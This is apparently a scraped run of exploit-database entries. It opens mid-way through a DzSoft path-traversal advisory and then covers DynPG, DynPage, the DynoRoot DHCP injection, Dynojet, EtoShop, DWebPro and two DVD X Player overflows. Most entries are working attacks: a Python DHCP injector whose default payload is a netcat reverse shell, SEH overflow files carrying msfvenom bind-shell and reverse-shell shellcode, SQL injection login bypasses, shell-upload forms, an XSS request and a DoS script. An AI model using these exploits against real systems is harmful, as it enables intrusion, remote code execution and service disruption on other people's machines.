< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type:
Content-Type:
< Content-Length: 5
Content-Length: 5
< Cache-Control: no-cache
Cache-Control: no-cache
< Expires: 0


Checking for "xampp_shell.bat"
///////////////////////////////

C:\>curl  -v -I "http://VICTIM-IP/\../xampp_shell.bat"
*   Trying VICTIM-IP...
* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0)
> HEAD /\../xampp_shell.bat HTTP/1.1
> User-Agent: curl/7.41.0
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type:
Content-Type:
< Content-Length: 1084
Content-Length: 1084
< Cache-Control: no-cache


These also work...


[root@localhost local]# wget -S --spider  "http://VICTIM-IP:8080/\../mysql/my-huge.ini"
--10:26:21--  http://VICTIM-IP:8080/%5C../mysql/my-huge.ini
Connecting to VICTIM-IP:8080... connected.
HTTP request sent, awaiting response... 
  HTTP/1.0 200 OK
  Content-Type: 
  Content-Length: 5057
  Cache-Control: no-cache
  Expires: 0
Length: 5057 (4.9K) []
200 OK


[root@localhost local]# wget -S --spider  "http://VICTIM-IP:8080/\../mysql/my-innodb-heavy-4G.ini"
--10:29:03--  http://VICTIM-IP:8080/%5C../mysql/my-innodb-heavy-4G.ini
Connecting to VICTIM-IP:8080... connected.
HTTP request sent, awaiting response... 
  HTTP/1.0 200 OK
  Content-Type: 
  Content-Length: 20906
  Cache-Control: no-cache
  Expires: 0
Length: 20906 (20K) []
200 OK


Tested Windows XAMPP, Linux / curl
curl 7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5


//////////////////////////////////////////

Next, target files on C:\ Drive.

Bypass 401 Forbidden to enumerate a file on C:\ drive named "hi.txt"
wget "http://127.0.0.1:8088/c/hi.txt"  -c --header="Range: bytes=0"



Exploit/POC:
=============
In DZSoft PHP Editor

1) Change DzSoft web server options for remote address to IP other than localhost.
2) Create test PHP file deploy under xampp/htdocs or whatever Apache your using.
3) Start DzSofts built-in webserver to preview PHP file 

Then,


import socket

print 'DzSoft File Enumeration POC'
print 'Hyp3rlinx / ApparitionSec'

IP=raw_input("[IP]>")
PORT=int(raw_input("[PORT]>"))
DEPTH=int(raw_input("[DEPTH]>"))
FILE=raw_input("[FILE]>")
ENUM="HEAD "+"/\\"
ENUM+="../"*DEPTH+FILE+ " HTTP/1.0\r\n\r\n"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(ENUM)
print 'Enumerating file:'
print ENUM
output = s.recv(128)
print output
s.close()




Network Access:
===============
Remote



Severity:
=========
Medium



Disclosure Timeline:
==================================
Vendor Notification: No reply
March 27, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
HireHackking 
# Exploit Title: DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2020-10-09
# Exploit Author: Enes Özeser
# Vendor Homepage: https://dynpg.org/
# Version: 4.9.1
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Login to admin panel.
2- Click on the "Texts" button.
3- Write XSS payload into the Groupname. 
4- Press "Create" button.

XSS Payload ==> <script>alert("XSS");</script> 

==> HTTP Request <==

POST /index.php?show=4 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------342819783638885794661955465553
Content-Length: 725
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/index.php?show=4
Cookie: PHPSESSID=bsbas234jfvvdasdasd1i
Upgrade-Insecure-Requests: 1

-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="NEW_GROUP_NAME"

<script>alert("XSS");</script>
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="GROUP_ID"

0
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="GRP_SUBMIT"

Create
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="GRP_ACTION"

new_grp
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="dpg_csrf_token"

3F16478C29BED20AA73F1D25CB23F471
-----------------------------342819783638885794661955465553--
HireHackking 
source: https://www.securityfocus.com/bid/53696/info

DynPage is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

DynPage 1.0 is vulnerable; other versions may also be affected. 

########>>>>> Explo!T <<<<<<##################

# Download : [http://www.dynpage.net/download/dynpage.zip]

### [ Upload Sh3LL.php;.txt ] =>

<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Files" method="post" enctype="multipart/form-data" >
<input name="Files" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>



### [ Upload Sh3LL.php;.gif ;.jpeg ] =>

<!-- p0c 1 -->
<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Images" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

<!-- p0c 2 -->
<form action="http://www.example.com/[path]/js/ckfinder/ckfinder.html?Type=Images" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>


### [ Upload Sh3LL.php;.swf ;.flv ] =>

<!-- p0c 1 -->
<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Flash" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

<!-- p0c 2 -->
<form action="http://www.example.com/[path]/js/ckfinder/ckfinder.html?Type=Flash" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>
############# << ThE|End
HireHackking 
# Exploit Title: DynoRoot DHCP - Client Command Injection
# Date: 2018-05-18
# Exploit Author: Kevin Kirsche
# Exploit Repository: https://github.com/kkirsche/CVE-2018-1111
# Exploit Discoverer: Felix Wilhelm
# Vendor Homepage: https://www.redhat.com/
# Version: RHEL 6.x / 7.x and CentOS 6.x/7.x
# Tested on: CentOS Linux release 7.4.1708 (Core)  / NetworkManager 1.8.0-11.el7_4
# CVE : CVE-2018-1111

#!/usr/bin/env python

from argparse import ArgumentParser
from scapy.all import BOOTP_am, DHCP
from scapy.base_classes import Net


class DynoRoot(BOOTP_am):
    function_name = "dhcpd"

    def make_reply(self, req):
        resp = BOOTP_am.make_reply(self, req)
        if DHCP in req:
            dhcp_options = [(op[0], {1: 2, 3: 5}.get(op[1], op[1]))
                            for op in req[DHCP].options
                            if isinstance(op, tuple) and op[0] == "message-type"]
            dhcp_options += [("server_id", self.gw),
                             ("domain", self.domain),
                             ("router", self.gw),
                             ("name_server", self.gw),
                             ("broadcast_address", self.broadcast),
                             ("subnet_mask", self.netmask),
                             ("renewal_time", self.renewal_time),
                             ("lease_time", self.lease_time),
                             (252, "x'&{payload} #".format(payload=self.payload)),
                             "end"
                             ]
            resp /= DHCP(options=dhcp_options)
        return resp


if __name__ == '__main__':
    parser = ArgumentParser(description='CVE-2018-1111 DynoRoot exploit')

    parser.add_argument('-i', '--interface', default='eth0', type=str,
                        dest='interface',
                        help='The interface to listen for DHCP requests on (default: eth0)')
    parser.add_argument('-s', '--subnet', default='192.168.41.0/24', type=str,
                        dest='subnet', help='The network to assign via DHCP (default: 192.168.41.0/24)')
    parser.add_argument('-g', '--gateway', default='192.168.41.254', type=str,
                        dest='gateway', help='The network gateway to respond with (default: 192.168.41.254)')
    parser.add_argument('-d', '--domain', default='victim.net', type=str,
                        dest='domain', help='Domain to assign (default: victim.net)')
    parser.add_argument('-p', '--payload', default='nc -e /bin/bash 192.168.41.2 1337', type=str,
                        dest='payload', help='The payload / command to inject (default: nc -e /bin/bash 192.168.41.2 1337)')

    args = parser.parse_args()
    server = DynoRoot(iface=args.interface, domain=args.domain,
                      pool=Net(args.subnet),
                      network=args.subnet,
                      gw=args.gateway,
                      renewal_time=600, lease_time=3600)
    server.payload = args.payload

    server()
HireHackking 
# Exploit Title: Dynojet Power Core 2.3.0 - Unquoted Service Path
# Exploit Author: Pedro Sousa Rodrigues (https://www.0x90.zone/ / @Pedro_SEC_R)
# Version: 2.3.0 (Build 303)
# Date: 30.10.2021
# Vendor Homepage: https://www.dynojet.com/
# Software Link: https://docs.dynojet.com/Document/18762
# Tested on: Windows 10 Version 21H1 (OS Build 19043.1320)

SERVICE_NAME: DJ.UpdateService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DJ.UpdateService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
PS C:\Users\Developer> Get-UnquotedService


ServiceName    : DJ.UpdateService
Path           : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users;
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
CanRestart     : True
Name           : DJ.UpdateService

ServiceName    : DJ.UpdateService
Path           : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
CanRestart     : True
Name           : DJ.UpdateService

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path (depending on the installation path). The service might be executed manually by any Authenticated user. If successful, the local user's code would execute with the elevated privileges of Local System.
HireHackking 
source: https://www.securityfocus.com/bid/64371/info
 
EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
 
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
 
EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected.

www.example.com/dweb/login.asp

UserID : x' or ' 1=1--
Password : x' or ' 1=1--
HireHackking 
source: https://www.securityfocus.com/bid/64371/info

EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected.

http://www.example.com/dweb/apps/news-events/newdetail.asp?id=1=[SQL INJECTION]
HireHackking 
# Exploit Title: DWebPro 8.4.2 Remote Binary Execution
# Date: 01/10/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Author twitter: @tulpa_security
# Vendor Homepage: http://www.dwebpro.com/
# Software Link: http://www.dwebpro.com/download
# Version: 8.4.2
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec

1. Description:

DWebPro is a software package used for used for distributing dynamical web sites on CD/DVD or USB drives. It
includes it's own web server called "primary web server" as well as an SMTP server. The POC below relates to the
installation of DWebPro itself however it is conceivable that the vulnerability could be leveraged within certain
contexts from a CD/DVD or USB drive. Dependent on the client configuration this vulnerability could be exploited
remotely and/or locally. The SMTP server of DWebPro is also extremely susceptible to DOS attacks.

2. Remote Binary Execution and Local File Inclusion Proof of Concept

When browsing to the demo site installed with DWebPro you will find hyperlinks to various resources located on the
local machine. One such example is "http://127.0.0.1:8080/dwebpro/start?file=C:\DWebPro\deploy\..\help\english
\dwebpro.chm". Any file can be accessed on the vulnerable machine by simply replacing the start?file= location. It
is important to note however that when browsing to an executable file through this vulnerability, that the web server
will indeed run the application locally instead of prompting you for a download. As an example, the following will start the
calculator process on the victim machine "http://192.168.0.1:8080/dwebpro/start?file=C:\Windows\system32\calc.exe".
Calc.exe will by default execute with the same permission as the user who ran dwepro.exe initially.

Basic cmd commands can also be executed such as with "http://192.168.0.1:8080/dwebpro/start?file=ipconfig".

These privileges can be escalated to SYSTEM however by installing the application as a windows service which will
automatically run on start up. In order to initiate that installation, the attacker could take advantage of a script
which is installed by default and can be executed thanks to the LFI vulnerability. This can be accomplished by using
"http://192.168.0.1:8080/dwebpro/start?file=C:\DWebPro\service\install.bat".

3. Denial of Service Proof of Concept

#!/usr/bin/python

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.0.1',25))

evil = 'A' * 300
s.recv(1024)
s.send(evil)

s.close()
HireHackking 
######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-
# Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################

# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of python file: 1710 bytes


file = open("exploit_dvdx_player_standard_5.5.3.9.plf","w")
buffer = "\x41" * 608
next_seh = "\xeb\x06\x90\x90"
seh = "\xBC\x13\x5F\x02" # pop/pop/ret : EchoDelayProcess.dll
nops = "\x90" * 100

buf = ""
buf += "\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a"
buf += "\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a"
buf += "\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8"
buf += "\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3"
buf += "\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9"
buf += "\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21"
buf += "\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98"
buf += "\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1"
buf += "\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05"
buf += "\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65"
buf += "\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40"
buf += "\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5"
buf += "\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb"
buf += "\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a"
buf += "\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20"
buf += "\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f"
buf += "\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d"
buf += "\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05"
buf += "\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f"
buf += "\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78"
buf += "\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07"
buf += "\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8"
buf += "\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5"
buf += "\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e"
buf += "\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49"
buf += "\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7"
buf += "\xbe\xde\x84\xf2"

file.write(buffer + next_seh + seh + nops + buf)
file.close()
HireHackking 
#!/usr/bin/env python

# Exploit Title: DVD X Player 5.5.3 Buffer Overflow
# Date: 20.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
# Version: 5.5.3.8 and above
# Tested on: Windows 7 Professional SP1 x86
# CVE : CVE-2018-9128
# Similiar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438 
#   In Windows 7, SEH handler to be used contains a \x00 byte that it has been
#   obtained using a restricted char. For such a reason, every jump has to be
#   backward on the beginning of attacking shellcode.

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\x00\x0a\x1a\x0d' -f py -v shellcode

shellcode = ""
shellcode += "\xb8\xb8\xfa\xed\xbb\xda\xc1\xd9\x74\x24\xf4\x5a"
shellcode += "\x33\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x7a"
shellcode += "\xfe\x0f\x4e\x86\x17\x4d\xb1\x76\xe8\x32\x3b\x93"
shellcode += "\xd9\x72\x5f\xd0\x4a\x43\x2b\xb4\x66\x28\x79\x2c"
shellcode += "\xfc\x5c\x56\x43\xb5\xeb\x80\x6a\x46\x47\xf0\xed"
shellcode += "\xc4\x9a\x25\xcd\xf5\x54\x38\x0c\x31\x88\xb1\x5c"
shellcode += "\xea\xc6\x64\x70\x9f\x93\xb4\xfb\xd3\x32\xbd\x18"
shellcode += "\xa3\x35\xec\x8f\xbf\x6f\x2e\x2e\x13\x04\x67\x28"
shellcode += "\x70\x21\x31\xc3\x42\xdd\xc0\x05\x9b\x1e\x6e\x68"
shellcode += "\x13\xed\x6e\xad\x94\x0e\x05\xc7\xe6\xb3\x1e\x1c"
shellcode += "\x94\x6f\xaa\x86\x3e\xfb\x0c\x62\xbe\x28\xca\xe1"
shellcode += "\xcc\x85\x98\xad\xd0\x18\x4c\xc6\xed\x91\x73\x08"
shellcode += "\x64\xe1\x57\x8c\x2c\xb1\xf6\x95\x88\x14\x06\xc5"
shellcode += "\x72\xc8\xa2\x8e\x9f\x1d\xdf\xcd\xf7\xd2\xd2\xed"
shellcode += "\x07\x7d\x64\x9e\x35\x22\xde\x08\x76\xab\xf8\xcf"
shellcode += "\x79\x86\xbd\x5f\x84\x29\xbe\x76\x43\x7d\xee\xe0"
shellcode += "\x62\xfe\x65\xf0\x8b\x2b\x29\xa0\x23\x84\x8a\x10"
shellcode += "\x84\x74\x63\x7a\x0b\xaa\x93\x85\xc1\xc3\x3e\x7c"
shellcode += "\x82\x2b\x16\x46\x38\xc4\x65\xb6\xad\x48\xe3\x50"
shellcode += "\xa7\x60\xa5\xcb\x50\x18\xec\x87\xc1\xe5\x3a\xe2"
shellcode += "\xc2\x6e\xc9\x13\x8c\x86\xa4\x07\x79\x67\xf3\x75"
shellcode += "\x2c\x78\x29\x11\xb2\xeb\xb6\xe1\xbd\x17\x61\xb6"
shellcode += "\xea\xe6\x78\x52\x07\x50\xd3\x40\xda\x04\x1c\xc0"
shellcode += "\x01\xf5\xa3\xc9\xc4\x41\x80\xd9\x10\x49\x8c\x8d"
shellcode += "\xcc\x1c\x5a\x7b\xab\xf6\x2c\xd5\x65\xa4\xe6\xb1"
shellcode += "\xf0\x86\x38\xc7\xfc\xc2\xce\x27\x4c\xbb\x96\x58"
shellcode += "\x61\x2b\x1f\x21\x9f\xcb\xe0\xf8\x1b\xf5\x11\x30"
shellcode += "\xb6\x62\x88\xa1\xfb\xee\x2b\x1c\x3f\x17\xa8\x94"
shellcode += "\xc0\xec\xb0\xdd\xc5\xa9\x76\x0e\xb4\xa2\x12\x30"
shellcode += "\x6b\xc2\x36"

junk = "\x90" * (600 -len(shellcode))
junk += shellcode

# nasm > jmp $-400
# 00000000  E96BFEFFFF        jmp 0xfffffe70
backflip="\x90\x90\x90\xE9\x6B\xFE\xFF\xFF"
junk += backflip

# 00401838  |. 5E             POP ESI
junk += "\xeb\xf6\x90\x90"
junk += "\x38\x18\x40\x1a"

file = open("evil_playlist.plf", "w")
file.write(junk)
file.close()